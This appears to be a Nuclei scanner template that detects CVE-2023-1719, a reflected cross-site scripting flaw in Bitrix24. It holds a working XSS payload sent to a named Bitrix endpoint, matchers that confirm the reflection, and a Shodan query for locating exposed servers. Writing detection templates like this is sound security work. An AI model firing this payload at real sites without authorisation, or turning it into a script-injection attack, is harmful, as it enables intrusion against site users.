50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: CVE-2023-1719
|
||
|
||
info:
|
||
name: Bitrix Component - Cross-Site Scripting
|
||
author: DhiyaneshDk
|
||
severity: critical
|
||
description: |
|
||
Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
|
||
reference:
|
||
- https://starlabs.sg/advisories/23/23-1719/
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2023-1719
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
cvss-score: 9.8
|
||
cve-id: CVE-2023-1719
|
||
cwe-id: CWE-665
|
||
epss-score: 0.02807
|
||
epss-percentile: 0.89587
|
||
cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
|
||
metadata:
|
||
verified: true
|
||
max-request: 1
|
||
vendor: bitrix24
|
||
product: bitrix24
|
||
shodan-query: html:"/bitrix/"
|
||
tags: cve2023,cve,bitrix,xss,bitrix24
|
||
|
||
http:
|
||
- method: GET
|
||
path:
|
||
- "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- "'LOG_CNT':"
|
||
- "<img onerror=alert(document.domain) src=1>"
|
||
condition: and
|
||
|
||
- type: word
|
||
part: header
|
||
words:
|
||
- text/html
|
||
|
||
- type: status
|
||
status:
|
||
- 200
|
||
# digest: 490a0046304402206be0d95d0753f58cc3d44f79a68c2ab600c25d643f4a34d82541d3e6850f341e022044c2d52e48d1149ba5587056c2b48b8be6c7f4616e0cf4937440d6eb081c1cb5:922c64590222798bb761d5b6d8e72950 |